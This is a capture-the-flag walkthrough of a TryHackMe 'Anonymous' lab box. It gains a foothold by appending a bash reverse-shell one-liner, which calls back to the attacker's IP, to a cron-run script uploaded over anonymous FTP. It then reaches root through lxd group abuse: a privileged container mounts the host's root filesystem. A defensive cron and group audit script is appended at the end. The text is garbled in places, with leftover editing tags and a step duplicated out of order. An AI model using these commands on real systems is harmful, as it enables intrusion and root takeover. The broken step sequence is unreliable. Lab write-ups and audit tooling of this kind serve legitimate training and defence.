Anonymous THM
IP
10.10.133.171
Nmap initial scan
sudo nmap -sV -sC -A -oA nmap_inital 10.10.133.171

Nmap full scan
It is always a good idea to run a full port scan after the initial scan.
sudo nmap -p- -oA nmap_full 10.10.133.171
Nothing interesting
Ports open
21:FTP
We can tell from our Nmap scan that anonymous login is enabled
22:SSH
139:SMB
445:SMB
FTP
Let's log in to the FTP server as anonymous.
ftp anonymous@10.10.133.171
Looking through the FTP share we find a directory called scripts, and within scripts we can see:

Let's download the files
get clean.sh
get removed_files.log
get to_do.txt
Viewing to_do.txt we see:

couldn't agree more
When we look at clean.sh:

Interesting; I wonder if this script is part of a cron job. If we look through removed_files.log:

we can see clean.sh has been run several times. Let's check the creation time of the log:

We can see the log file is being updated every minute, most likely by a cron job running the clean.sh script. Let's see if we can replace clean.sh with a bash reverse shell.
</gre_replace>
<gr_replace lines="50-52" cat="clarify" orig="Let's stabilize our shell">
Let's stabilize our shell:
python3 -c "import pty;pty.spawn('/bin/bash')"
In our new shell, let's check our id and the groups we are part of.
reverse shell
bash -i >& /dev/tcp/10.14.45.1/9001 0>&1
we can add this one-liner to the end of the clean.sh script

Let's start a Netcat listener
nc -lvnp 9001
Now let's put this on the FTP server
ftp anonymous@10.10.133.171
cd scripts
put clean.sh

Now we can wait for the scripts to execute and we should get a shell on the system.

Privilege escalation via namelessonone
Let's stabilize our shell
python3 -c "import pty;pty.spawn('/bin/bash')"
in our new shell let's check our id and groups we are part off

We can see we are part of the adm group, meaning we usually have permission to read the log files located inside /var/log, so we should look there first.
We didn't find anything interesting there.
Let's see if we can find any suid files
find / -type f -perm -04000 -ls 2>/dev/null
Nothing interesting
Let's check the kernel version and see if it is vulnerable:
cat /proc/version
Nothing too interesting.
If we look back at the groups we are part of, we notice we are also in the lxd group.
We can refer to the following article: https://steflan-security.com/linux-privilege-escalation-exploiting-the-lxc-lxd-groups/
Essentially, LXD is the Linux Container Daemon service. As members of the lxd group we can use the service, and we can abuse it. First, we need a few things:
we need to clone the following repo onto our local machine
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sudo ./build-alpine
From here we should have the following files:

What did we do?
Well, an easy way to go about this is to build an Alpine image (a lightweight Linux distribution). Once we transfer the compressed file over to our target system, we can start the container using the
security.privileged=true
flag, forcing the container to interact as root with the host file system.
Now we need to transfer the compressed file to the target machine.
Let's start a python3 web server:
python3 -m http.server 8080
From our target machine we can use wget to download the file:
wget http://10.14.45.1:8080/alpine-v3.13-x86_64-20210218_0139.tar.gz
Next, on our target machine, we need to import the image using the lxc command line tool; it's important to do it within our home directory.
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
Before we actually use the image, LXD should be initialized and its storage pool configured; just pick the default for all options.
lxd init
Now the image can be run with the security.privileged
flag set to true, which will grant the current user root access within the container.
lxc init myimage mycontainer -c security.privileged=true

Now we need to mount the root folder of the host into the container, under /mnt/root:
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

Now we can start the container and use the "exec" lxc command to execute a /bin/sh shell:
lxc start mycontainer
lxc exec mycontainer /bin/sh

we are now root!
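As an added example (not part of the original writeup), here is a small Python audit script a defender could run on a host to catch the two misconfigurations chained above: a root cron job that executes a script other users can modify (the clean.sh case), and accounts in high-privilege groups such as lxd and adm. The crontab content, the clean.sh file and the /etc/group entries are constructed sample data, and the account name svcuser is a placeholder.

```python
import os
import re
import stat
import tempfile

# Groups that are root-equivalent (lxd, docker, sudo, wheel) or can read sensitive logs (adm).
PRIVILEGED_GROUPS = {"lxd", "adm", "docker", "sudo", "wheel"}

def parse_crontab(text):
    """(user, command) pairs from /etc/crontab-style lines; skips comments and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        fields = line.split(None, 6)  # five time fields, user, command
        if len(fields) == 7 and not fields[0].startswith("#") and "=" not in fields[0]:
            jobs.append((fields[5], fields[6]))
    return jobs

def script_paths(command):
    """Absolute paths referenced by a cron command, e.g. /bin/bash /opt/clean.sh."""
    return re.findall(r"(?<![\w-])/[\w./-]+", command)

def writable_by_others(path):
    """True if the file exists and is group- or world-writable."""
    mode = os.stat(path).st_mode if os.path.exists(path) else 0
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_cron(text):
    """Root cron jobs whose script could be rewritten by an unprivileged user."""
    return [(p, cmd) for user, cmd in parse_crontab(text)
            if user == "root" for p in script_paths(cmd) if writable_by_others(p)]

def risky_group_members(group_text):
    """Privileged group -> members, parsed from /etc/group content."""
    out = {}
    for line in group_text.splitlines():
        parts = line.split(":")
        if len(parts) == 4 and parts[0] in PRIVILEGED_GROUPS and parts[3]:
            out[parts[0]] = parts[3].split(",")
    return out

def demo():
    """Constructed sample: a world-writable clean.sh run by root every minute."""
    script = os.path.join(tempfile.mkdtemp(), "clean.sh")
    with open(script, "w") as f:
        f.write("#!/bin/bash\nrm -rf /tmp/*\n")
    os.chmod(script, 0o777)  # the FTP-writable state this writeup abuses (constructed)
    crontab = f"SHELL=/bin/bash\n* * * * * root /bin/bash {script}\n"
    group = "root:x:0:\nadm:x:4:syslog,svcuser\nlxd:x:108:svcuser\nusers:x:100:\n"
    return audit_cron(crontab), risky_group_members(group)
```

On a real host, feed audit_cron the contents of /etc/crontab and the files under /etc/cron.d, and risky_group_members the contents of /etc/group; any hit is a finding to fix (tighten the script's permissions and review the group membership).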